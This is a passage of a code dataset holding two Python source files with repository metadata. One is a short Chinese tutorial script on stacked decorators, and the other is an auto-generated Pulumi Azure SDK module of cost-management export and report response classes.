3af9e10c47b578144db49dc4a3c0c93d4a424b09 | e49a07ad215172e9c82cb418b10371bf0ce1c0f7 | /第2章 python核心编程/第1节.python核心编程/02-python高级-2/2-装饰器/04-多个装饰器.py | 12d352b3d7c3d9596c627310543bec4da181c946 | [] | no_license | taogangshow/python_Code | 829c25a7e32ead388c8b3ffa763cb9cf587bfd7b | 4b3d6992ec407d6069f3187ca7e402a14d863fff | refs/heads/master | 2022-12-16T01:26:17.569230 | 2018-11-16T10:07:59 | 2018-11-16T10:07:59 | 157,832,985 | 0 | 1 | null | 2022-11-25T09:55:32 | 2018-11-16T08:00:13 | Python | UTF-8 | Python | false | false | 404 | py | #定义函数:完成包裹数据
def makeBold(fn):
def wrapped():
return "<b>" + fn() + "</b>"
return wrapped
#定义函数:完成包裹数据
def makeItalic(fn):
def wrapped():
return "<i>" + fn() + "</i>"
return wrapped
@makeBold #test3 = makeBold(test3)
@makeItalic #test3 = makeItalic(test3)
def test3():
return "hello world-3"
ret = test3()
print(ret)
| [
"cdtaogang@163.com"
] | cdtaogang@163.com |
61a3468700236973c7e5edf3ae96308896fe3265 | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/costmanagement/latest/outputs.py | 4051a81f344790da31f5a8c6ff074ab075ae0551 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 47,672 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'CommonExportPropertiesResponse',
'ErrorDetailsResponse',
'ExportDatasetConfigurationResponse',
'ExportDatasetResponse',
'ExportDefinitionResponse',
'ExportDeliveryDestinationResponse',
'ExportDeliveryInfoResponse',
'ExportExecutionListResultResponse',
'ExportExecutionResponse',
'ExportRecurrencePeriodResponse',
'ExportScheduleResponse',
'ExportTimePeriodResponse',
'KpiPropertiesResponse',
'PivotPropertiesResponse',
'ReportConfigAggregationResponse',
'ReportConfigComparisonExpressionResponse',
'ReportConfigDatasetConfigurationResponse',
'ReportConfigDatasetResponse',
'ReportConfigDefinitionResponse',
'ReportConfigDeliveryDestinationResponse',
'ReportConfigDeliveryInfoResponse',
'ReportConfigFilterResponse',
'ReportConfigGroupingResponse',
'ReportConfigRecurrencePeriodResponse',
'ReportConfigScheduleResponse',
'ReportConfigSortingResponse',
'ReportConfigTimePeriodResponse',
]
@pulumi.output_type
class CommonExportPropertiesResponse(dict):
"""
The common properties of the export.
"""
def __init__(__self__, *,
definition: 'outputs.ExportDefinitionResponse',
delivery_info: 'outputs.ExportDeliveryInfoResponse',
next_run_time_estimate: str,
format: Optional[str] = None,
run_history: Optional['outputs.ExportExecutionListResultResponse'] = None):
"""
The common properties of the export.
:param 'ExportDefinitionResponseArgs' definition: Has the definition for the export.
:param 'ExportDeliveryInfoResponseArgs' delivery_info: Has delivery information for the export.
:param str next_run_time_estimate: If the export has an active schedule, provides an estimate of the next execution time.
:param str format: The format of the export being delivered. Currently only 'Csv' is supported.
:param 'ExportExecutionListResultResponseArgs' run_history: If requested, has the most recent execution history for the export.
"""
pulumi.set(__self__, "definition", definition)
pulumi.set(__self__, "delivery_info", delivery_info)
pulumi.set(__self__, "next_run_time_estimate", next_run_time_estimate)
if format is not None:
pulumi.set(__self__, "format", format)
if run_history is not None:
pulumi.set(__self__, "run_history", run_history)
@property
@pulumi.getter
def definition(self) -> 'outputs.ExportDefinitionResponse':
"""
Has the definition for the export.
"""
return pulumi.get(self, "definition")
@property
@pulumi.getter(name="deliveryInfo")
def delivery_info(self) -> 'outputs.ExportDeliveryInfoResponse':
"""
Has delivery information for the export.
"""
return pulumi.get(self, "delivery_info")
@property
@pulumi.getter(name="nextRunTimeEstimate")
def next_run_time_estimate(self) -> str:
"""
If the export has an active schedule, provides an estimate of the next execution time.
"""
return pulumi.get(self, "next_run_time_estimate")
@property
@pulumi.getter
def format(self) -> Optional[str]:
"""
The format of the export being delivered. Currently only 'Csv' is supported.
"""
return pulumi.get(self, "format")
@property
@pulumi.getter(name="runHistory")
def run_history(self) -> Optional['outputs.ExportExecutionListResultResponse']:
"""
If requested, has the most recent execution history for the export.
"""
return pulumi.get(self, "run_history")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ErrorDetailsResponse(dict):
"""
The details of the error.
"""
def __init__(__self__, *,
code: str,
message: str):
"""
The details of the error.
:param str code: Error code.
:param str message: Error message indicating why the operation failed.
"""
pulumi.set(__self__, "code", code)
pulumi.set(__self__, "message", message)
@property
@pulumi.getter
def code(self) -> str:
"""
Error code.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def message(self) -> str:
"""
Error message indicating why the operation failed.
"""
return pulumi.get(self, "message")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDatasetConfigurationResponse(dict):
"""
The export dataset configuration. Allows columns to be selected for the export. If not provided then the export will include all available columns.
"""
def __init__(__self__, *,
columns: Optional[Sequence[str]] = None):
"""
The export dataset configuration. Allows columns to be selected for the export. If not provided then the export will include all available columns.
:param Sequence[str] columns: Array of column names to be included in the export. If not provided then the export will include all available columns. The available columns can vary by customer channel (see examples).
"""
if columns is not None:
pulumi.set(__self__, "columns", columns)
@property
@pulumi.getter
def columns(self) -> Optional[Sequence[str]]:
"""
Array of column names to be included in the export. If not provided then the export will include all available columns. The available columns can vary by customer channel (see examples).
"""
return pulumi.get(self, "columns")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDatasetResponse(dict):
"""
The definition for data in the export.
"""
def __init__(__self__, *,
configuration: Optional['outputs.ExportDatasetConfigurationResponse'] = None,
granularity: Optional[str] = None):
"""
The definition for data in the export.
:param 'ExportDatasetConfigurationResponseArgs' configuration: The export dataset configuration.
:param str granularity: The granularity of rows in the export. Currently only 'Daily' is supported.
"""
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if granularity is not None:
pulumi.set(__self__, "granularity", granularity)
@property
@pulumi.getter
def configuration(self) -> Optional['outputs.ExportDatasetConfigurationResponse']:
"""
The export dataset configuration.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter
def granularity(self) -> Optional[str]:
"""
The granularity of rows in the export. Currently only 'Daily' is supported.
"""
return pulumi.get(self, "granularity")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDefinitionResponse(dict):
"""
The definition of an export.
"""
def __init__(__self__, *,
timeframe: str,
type: str,
data_set: Optional['outputs.ExportDatasetResponse'] = None,
time_period: Optional['outputs.ExportTimePeriodResponse'] = None):
"""
The definition of an export.
:param str timeframe: The time frame for pulling data for the export. If custom, then a specific time period must be provided.
:param str type: The type of the export. Note that 'Usage' is equivalent to 'ActualCost' and is applicable to exports that do not yet provide data for charges or amortization for service reservations.
:param 'ExportDatasetResponseArgs' data_set: The definition for data in the export.
:param 'ExportTimePeriodResponseArgs' time_period: Has time period for pulling data for the export.
"""
pulumi.set(__self__, "timeframe", timeframe)
pulumi.set(__self__, "type", type)
if data_set is not None:
pulumi.set(__self__, "data_set", data_set)
if time_period is not None:
pulumi.set(__self__, "time_period", time_period)
@property
@pulumi.getter
def timeframe(self) -> str:
"""
The time frame for pulling data for the export. If custom, then a specific time period must be provided.
"""
return pulumi.get(self, "timeframe")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the export. Note that 'Usage' is equivalent to 'ActualCost' and is applicable to exports that do not yet provide data for charges or amortization for service reservations.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="dataSet")
def data_set(self) -> Optional['outputs.ExportDatasetResponse']:
"""
The definition for data in the export.
"""
return pulumi.get(self, "data_set")
@property
@pulumi.getter(name="timePeriod")
def time_period(self) -> Optional['outputs.ExportTimePeriodResponse']:
"""
Has time period for pulling data for the export.
"""
return pulumi.get(self, "time_period")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDeliveryDestinationResponse(dict):
"""
The destination information for the delivery of the export. To allow access to a storage account, you must register the account's subscription with the Microsoft.CostManagementExports resource provider. This is required once per subscription. When creating an export in the Azure portal, it is done automatically, however API users need to register the subscription. For more information see https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-manager-supported-services .
"""
def __init__(__self__, *,
container: str,
resource_id: str,
root_folder_path: Optional[str] = None):
"""
The destination information for the delivery of the export. To allow access to a storage account, you must register the account's subscription with the Microsoft.CostManagementExports resource provider. This is required once per subscription. When creating an export in the Azure portal, it is done automatically, however API users need to register the subscription. For more information see https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-manager-supported-services .
:param str container: The name of the container where exports will be uploaded.
:param str resource_id: The resource id of the storage account where exports will be delivered.
:param str root_folder_path: The name of the directory where exports will be uploaded.
"""
pulumi.set(__self__, "container", container)
pulumi.set(__self__, "resource_id", resource_id)
if root_folder_path is not None:
pulumi.set(__self__, "root_folder_path", root_folder_path)
@property
@pulumi.getter
def container(self) -> str:
"""
The name of the container where exports will be uploaded.
"""
return pulumi.get(self, "container")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> str:
"""
The resource id of the storage account where exports will be delivered.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="rootFolderPath")
def root_folder_path(self) -> Optional[str]:
"""
The name of the directory where exports will be uploaded.
"""
return pulumi.get(self, "root_folder_path")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportDeliveryInfoResponse(dict):
"""
The delivery information associated with a export.
"""
def __init__(__self__, *,
destination: 'outputs.ExportDeliveryDestinationResponse'):
"""
The delivery information associated with a export.
:param 'ExportDeliveryDestinationResponseArgs' destination: Has destination for the export being delivered.
"""
pulumi.set(__self__, "destination", destination)
@property
@pulumi.getter
def destination(self) -> 'outputs.ExportDeliveryDestinationResponse':
"""
Has destination for the export being delivered.
"""
return pulumi.get(self, "destination")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportExecutionListResultResponse(dict):
"""
Result of listing the execution history of an export.
"""
def __init__(__self__, *,
value: Sequence['outputs.ExportExecutionResponse']):
"""
Result of listing the execution history of an export.
:param Sequence['ExportExecutionResponseArgs'] value: A list of export executions.
"""
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def value(self) -> Sequence['outputs.ExportExecutionResponse']:
"""
A list of export executions.
"""
return pulumi.get(self, "value")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportExecutionResponse(dict):
"""
An export execution.
"""
def __init__(__self__, *,
id: str,
name: str,
tags: Mapping[str, str],
type: str,
error: Optional['outputs.ErrorDetailsResponse'] = None,
execution_type: Optional[str] = None,
file_name: Optional[str] = None,
processing_end_time: Optional[str] = None,
processing_start_time: Optional[str] = None,
run_settings: Optional['outputs.CommonExportPropertiesResponse'] = None,
status: Optional[str] = None,
submitted_by: Optional[str] = None,
submitted_time: Optional[str] = None):
"""
An export execution.
:param str id: Resource Id.
:param str name: Resource name.
:param Mapping[str, str] tags: Resource tags.
:param str type: Resource type.
:param 'ErrorDetailsResponseArgs' error: The details of any error.
:param str execution_type: The type of the export execution.
:param str file_name: The name of the exported file.
:param str processing_end_time: The time when the export execution finished.
:param str processing_start_time: The time when export was picked up to be executed.
:param 'CommonExportPropertiesResponseArgs' run_settings: The export settings that were in effect for this execution.
:param str status: The last known status of the export execution.
:param str submitted_by: The identifier for the entity that executed the export. For OnDemand executions it is the user email. For scheduled executions it is 'System'.
:param str submitted_time: The time when export was queued to be executed.
"""
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "tags", tags)
pulumi.set(__self__, "type", type)
if error is not None:
pulumi.set(__self__, "error", error)
if execution_type is not None:
pulumi.set(__self__, "execution_type", execution_type)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if processing_end_time is not None:
pulumi.set(__self__, "processing_end_time", processing_end_time)
if processing_start_time is not None:
pulumi.set(__self__, "processing_start_time", processing_start_time)
if run_settings is not None:
pulumi.set(__self__, "run_settings", run_settings)
if status is not None:
pulumi.set(__self__, "status", status)
if submitted_by is not None:
pulumi.set(__self__, "submitted_by", submitted_by)
if submitted_time is not None:
pulumi.set(__self__, "submitted_time", submitted_time)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def tags(self) -> Mapping[str, str]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def error(self) -> Optional['outputs.ErrorDetailsResponse']:
"""
The details of any error.
"""
return pulumi.get(self, "error")
@property
@pulumi.getter(name="executionType")
def execution_type(self) -> Optional[str]:
"""
The type of the export execution.
"""
return pulumi.get(self, "execution_type")
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[str]:
"""
The name of the exported file.
"""
return pulumi.get(self, "file_name")
@property
@pulumi.getter(name="processingEndTime")
def processing_end_time(self) -> Optional[str]:
"""
The time when the export execution finished.
"""
return pulumi.get(self, "processing_end_time")
@property
@pulumi.getter(name="processingStartTime")
def processing_start_time(self) -> Optional[str]:
"""
The time when export was picked up to be executed.
"""
return pulumi.get(self, "processing_start_time")
@property
@pulumi.getter(name="runSettings")
def run_settings(self) -> Optional['outputs.CommonExportPropertiesResponse']:
"""
The export settings that were in effect for this execution.
"""
return pulumi.get(self, "run_settings")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
The last known status of the export execution.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter(name="submittedBy")
def submitted_by(self) -> Optional[str]:
"""
The identifier for the entity that executed the export. For OnDemand executions it is the user email. For scheduled executions it is 'System'.
"""
return pulumi.get(self, "submitted_by")
@property
@pulumi.getter(name="submittedTime")
def submitted_time(self) -> Optional[str]:
"""
The time when export was queued to be executed.
"""
return pulumi.get(self, "submitted_time")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportRecurrencePeriodResponse(dict):
"""
The start and end date for recurrence schedule.
"""
def __init__(__self__, *,
from_: str,
to: Optional[str] = None):
"""
The start and end date for recurrence schedule.
:param str from_: The start date of recurrence.
:param str to: The end date of recurrence.
"""
pulumi.set(__self__, "from_", from_)
if to is not None:
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date of recurrence.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> Optional[str]:
"""
The end date of recurrence.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportScheduleResponse(dict):
"""
The schedule associated with the export.
"""
def __init__(__self__, *,
recurrence: str,
recurrence_period: Optional['outputs.ExportRecurrencePeriodResponse'] = None,
status: Optional[str] = None):
"""
The schedule associated with the export.
:param str recurrence: The schedule recurrence.
:param 'ExportRecurrencePeriodResponseArgs' recurrence_period: Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
:param str status: The status of the export's schedule. If 'Inactive', the export's schedule is paused.
"""
pulumi.set(__self__, "recurrence", recurrence)
if recurrence_period is not None:
pulumi.set(__self__, "recurrence_period", recurrence_period)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def recurrence(self) -> str:
"""
The schedule recurrence.
"""
return pulumi.get(self, "recurrence")
@property
@pulumi.getter(name="recurrencePeriod")
def recurrence_period(self) -> Optional['outputs.ExportRecurrencePeriodResponse']:
"""
Has start and end date of the recurrence. The start date must be in future. If present, the end date must be greater than start date.
"""
return pulumi.get(self, "recurrence_period")
@property
@pulumi.getter
def status(self) -> Optional[str]:
"""
The status of the export's schedule. If 'Inactive', the export's schedule is paused.
"""
return pulumi.get(self, "status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ExportTimePeriodResponse(dict):
"""
The date range for data in the export. This should only be specified with timeFrame set to 'Custom'. The maximum date range is 3 months.
"""
def __init__(__self__, *,
from_: str,
to: str):
"""
The date range for data in the export. This should only be specified with timeFrame set to 'Custom'. The maximum date range is 3 months.
:param str from_: The start date for export data.
:param str to: The end date for export data.
"""
pulumi.set(__self__, "from_", from_)
pulumi.set(__self__, "to", to)
@property
@pulumi.getter(name="from")
def from_(self) -> str:
"""
The start date for export data.
"""
return pulumi.get(self, "from_")
@property
@pulumi.getter
def to(self) -> str:
"""
The end date for export data.
"""
return pulumi.get(self, "to")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class KpiPropertiesResponse(dict):
"""
Each KPI must contain a 'type' and 'enabled' key.
"""
def __init__(__self__, *,
enabled: Optional[bool] = None,
id: Optional[str] = None,
type: Optional[str] = None):
"""
Each KPI must contain a 'type' and 'enabled' key.
:param bool enabled: show the KPI in the UI?
:param str id: ID of resource related to metric (budget).
:param str type: KPI type (Forecast, Budget).
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
show the KPI in the UI?
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
ID of resource related to metric (budget).
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
KPI type (Forecast, Budget).
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class PivotPropertiesResponse(dict):
"""
Each pivot must contain a 'type' and 'name'.
"""
def __init__(__self__, *,
name: Optional[str] = None,
type: Optional[str] = None):
"""
Each pivot must contain a 'type' and 'name'.
:param str name: Data field to show in view.
:param str type: Data type to show in view.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Data field to show in view.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def type(self) -> Optional[str]:
"""
Data type to show in view.
"""
return pulumi.get(self, "type")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigAggregationResponse(dict):
"""
The aggregation expression to be used in the report.
"""
def __init__(__self__, *,
function: str,
name: str):
"""
The aggregation expression to be used in the report.
:param str function: The name of the aggregation function to use.
:param str name: The name of the column to aggregate.
"""
pulumi.set(__self__, "function", function)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def function(self) -> str:
"""
The name of the aggregation function to use.
"""
return pulumi.get(self, "function")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to aggregate.
"""
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigComparisonExpressionResponse(dict):
"""
The comparison expression to be used in the report.
"""
def __init__(__self__, *,
name: str,
operator: str,
values: Sequence[str]):
"""
The comparison expression to be used in the report.
:param str name: The name of the column to use in comparison.
:param str operator: The operator to use for comparison.
:param Sequence[str] values: Array of values to use for comparison
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "operator", operator)
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the column to use in comparison.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def operator(self) -> str:
"""
The operator to use for comparison.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Sequence[str]:
"""
Array of values to use for comparison
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDatasetConfigurationResponse(dict):
"""
The configuration of dataset in the report.
"""
def __init__(__self__, *,
columns: Optional[Sequence[str]] = None):
"""
The configuration of dataset in the report.
:param Sequence[str] columns: Array of column names to be included in the report. Any valid report column name is allowed. If not provided, then report includes all columns.
"""
if columns is not None:
pulumi.set(__self__, "columns", columns)
@property
@pulumi.getter
def columns(self) -> Optional[Sequence[str]]:
"""
Array of column names to be included in the report. Any valid report column name is allowed. If not provided, then report includes all columns.
"""
return pulumi.get(self, "columns")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDatasetResponse(dict):
"""
The definition of data present in the report.
"""
def __init__(__self__, *,
aggregation: Optional[Mapping[str, 'outputs.ReportConfigAggregationResponse']] = None,
configuration: Optional['outputs.ReportConfigDatasetConfigurationResponse'] = None,
filter: Optional['outputs.ReportConfigFilterResponse'] = None,
granularity: Optional[str] = None,
grouping: Optional[Sequence['outputs.ReportConfigGroupingResponse']] = None,
sorting: Optional[Sequence['outputs.ReportConfigSortingResponse']] = None):
"""
The definition of data present in the report.
:param Mapping[str, 'ReportConfigAggregationResponseArgs'] aggregation: Dictionary of aggregation expression to use in the report. The key of each item in the dictionary is the alias for the aggregated column. Report can have up to 2 aggregation clauses.
:param 'ReportConfigDatasetConfigurationResponseArgs' configuration: Has configuration information for the data in the report. The configuration will be ignored if aggregation and grouping are provided.
:param 'ReportConfigFilterResponseArgs' filter: Has filter expression to use in the report.
:param str granularity: The granularity of rows in the report.
:param Sequence['ReportConfigGroupingResponseArgs'] grouping: Array of group by expression to use in the report. Report can have up to 2 group by clauses.
:param Sequence['ReportConfigSortingResponseArgs'] sorting: Array of order by expression to use in the report.
"""
if aggregation is not None:
pulumi.set(__self__, "aggregation", aggregation)
if configuration is not None:
pulumi.set(__self__, "configuration", configuration)
if filter is not None:
pulumi.set(__self__, "filter", filter)
if granularity is not None:
pulumi.set(__self__, "granularity", granularity)
if grouping is not None:
pulumi.set(__self__, "grouping", grouping)
if sorting is not None:
pulumi.set(__self__, "sorting", sorting)
@property
@pulumi.getter
def aggregation(self) -> Optional[Mapping[str, 'outputs.ReportConfigAggregationResponse']]:
"""
Dictionary of aggregation expression to use in the report. The key of each item in the dictionary is the alias for the aggregated column. Report can have up to 2 aggregation clauses.
"""
return pulumi.get(self, "aggregation")
@property
@pulumi.getter
def configuration(self) -> Optional['outputs.ReportConfigDatasetConfigurationResponse']:
"""
Has configuration information for the data in the report. The configuration will be ignored if aggregation and grouping are provided.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter
def filter(self) -> Optional['outputs.ReportConfigFilterResponse']:
"""
Has filter expression to use in the report.
"""
return pulumi.get(self, "filter")
@property
@pulumi.getter
def granularity(self) -> Optional[str]:
"""
The granularity of rows in the report.
"""
return pulumi.get(self, "granularity")
@property
@pulumi.getter
def grouping(self) -> Optional[Sequence['outputs.ReportConfigGroupingResponse']]:
"""
Array of group by expression to use in the report. Report can have up to 2 group by clauses.
"""
return pulumi.get(self, "grouping")
@property
@pulumi.getter
def sorting(self) -> Optional[Sequence['outputs.ReportConfigSortingResponse']]:
"""
Array of order by expression to use in the report.
"""
return pulumi.get(self, "sorting")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDefinitionResponse(dict):
"""
The definition of a report config.
"""
def __init__(__self__, *,
timeframe: str,
type: str,
dataset: Optional['outputs.ReportConfigDatasetResponse'] = None,
time_period: Optional['outputs.ReportConfigTimePeriodResponse'] = None):
"""
The definition of a report config.
:param str timeframe: The time frame for pulling data for the report. If custom, then a specific time period must be provided.
:param str type: The type of the report.
:param 'ReportConfigDatasetResponseArgs' dataset: Has definition for data in this report config.
:param 'ReportConfigTimePeriodResponseArgs' time_period: Has time period for pulling data for the report.
"""
pulumi.set(__self__, "timeframe", timeframe)
pulumi.set(__self__, "type", type)
if dataset is not None:
pulumi.set(__self__, "dataset", dataset)
if time_period is not None:
pulumi.set(__self__, "time_period", time_period)
@property
@pulumi.getter
def timeframe(self) -> str:
"""
The time frame for pulling data for the report. If custom, then a specific time period must be provided.
"""
return pulumi.get(self, "timeframe")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the report.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def dataset(self) -> Optional['outputs.ReportConfigDatasetResponse']:
"""
Has definition for data in this report config.
"""
return pulumi.get(self, "dataset")
@property
@pulumi.getter(name="timePeriod")
def time_period(self) -> Optional['outputs.ReportConfigTimePeriodResponse']:
"""
Has time period for pulling data for the report.
"""
return pulumi.get(self, "time_period")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDeliveryDestinationResponse(dict):
"""
The destination information for the delivery of the report.
"""
def __init__(__self__, *,
container: str,
resource_id: str,
root_folder_path: Optional[str] = None):
"""
The destination information for the delivery of the report.
:param str container: The name of the container where reports will be uploaded.
:param str resource_id: The resource id of the storage account where reports will be delivered.
:param str root_folder_path: The name of the directory where reports will be uploaded.
"""
pulumi.set(__self__, "container", container)
pulumi.set(__self__, "resource_id", resource_id)
if root_folder_path is not None:
pulumi.set(__self__, "root_folder_path", root_folder_path)
@property
@pulumi.getter
def container(self) -> str:
"""
The name of the container where reports will be uploaded.
"""
return pulumi.get(self, "container")
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> str:
"""
The resource id of the storage account where reports will be delivered.
"""
return pulumi.get(self, "resource_id")
@property
@pulumi.getter(name="rootFolderPath")
def root_folder_path(self) -> Optional[str]:
"""
The name of the directory where reports will be uploaded.
"""
return pulumi.get(self, "root_folder_path")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigDeliveryInfoResponse(dict):
"""
The delivery information associated with a report config.
"""
def __init__(__self__, *,
destination: 'outputs.ReportConfigDeliveryDestinationResponse'):
"""
The delivery information associated with a report config.
:param 'ReportConfigDeliveryDestinationResponseArgs' destination: Has destination for the report being delivered.
"""
pulumi.set(__self__, "destination", destination)
@property
@pulumi.getter
def destination(self) -> 'outputs.ReportConfigDeliveryDestinationResponse':
"""
Has destination for the report being delivered.
"""
return pulumi.get(self, "destination")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigFilterResponse(dict):
"""
The filter expression to be used in the report.
"""
def __init__(__self__, *,
and_: Optional[Sequence['outputs.ReportConfigFilterResponse']] = None,
dimension: Optional['outputs.ReportConfigComparisonExpressionResponse'] = None,
not_: Optional['outputs.ReportConfigFilterResponse'] = None,
or_: Optional[Sequence['outputs.ReportConfigFilterResponse']] = None,
tag: Optional['outputs.ReportConfigComparisonExpressionResponse'] = None):
"""
The filter expression to be used in the report.
:param Sequence['ReportConfigFilterResponseArgs'] and_: The logical "AND" expression. Must have at least 2 items.
:param 'ReportConfigComparisonExpressionResponseArgs' dimension: Has comparison expression for a dimension
:param 'ReportConfigFilterResponseArgs' not_: The logical "NOT" expression.
:param Sequence['ReportConfigFilterResponseArgs'] or_: The logical "OR" expression. Must have at least 2 items.
:param 'ReportConfigComparisonExpressionResponseArgs' tag: Has comparison expression for a tag
"""
if and_ is not None:
pulumi.set(__self__, "and_", and_)
if dimension is not None:
pulumi.set(__self__, "dimension", dimension)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if or_ is not None:
pulumi.set(__self__, "or_", or_)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter(name="and")
def and_(self) -> Optional[Sequence['outputs.ReportConfigFilterResponse']]:
"""
The logical "AND" expression. Must have at least 2 items.
"""
return pulumi.get(self, "and_")
@property
@pulumi.getter
def dimension(self) -> Optional['outputs.ReportConfigComparisonExpressionResponse']:
"""
Has comparison expression for a dimension
"""
return pulumi.get(self, "dimension")
@property
@pulumi.getter(name="not")
def not_(self) -> Optional['outputs.ReportConfigFilterResponse']:
"""
The logical "NOT" expression.
"""
return pulumi.get(self, "not_")
@property
@pulumi.getter(name="or")
def or_(self) -> Optional[Sequence['outputs.ReportConfigFilterResponse']]:
"""
The logical "OR" expression. Must have at least 2 items.
"""
return pulumi.get(self, "or_")
@property
@pulumi.getter
def tag(self) -> Optional['outputs.ReportConfigComparisonExpressionResponse']:
"""
Has comparison expression for a tag
"""
return pulumi.get(self, "tag")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ReportConfigGroupingResponse(dict):
"""
The group by expression to be used in the report.
"""
def __init__(__self__, *,
name: str,
type: str):
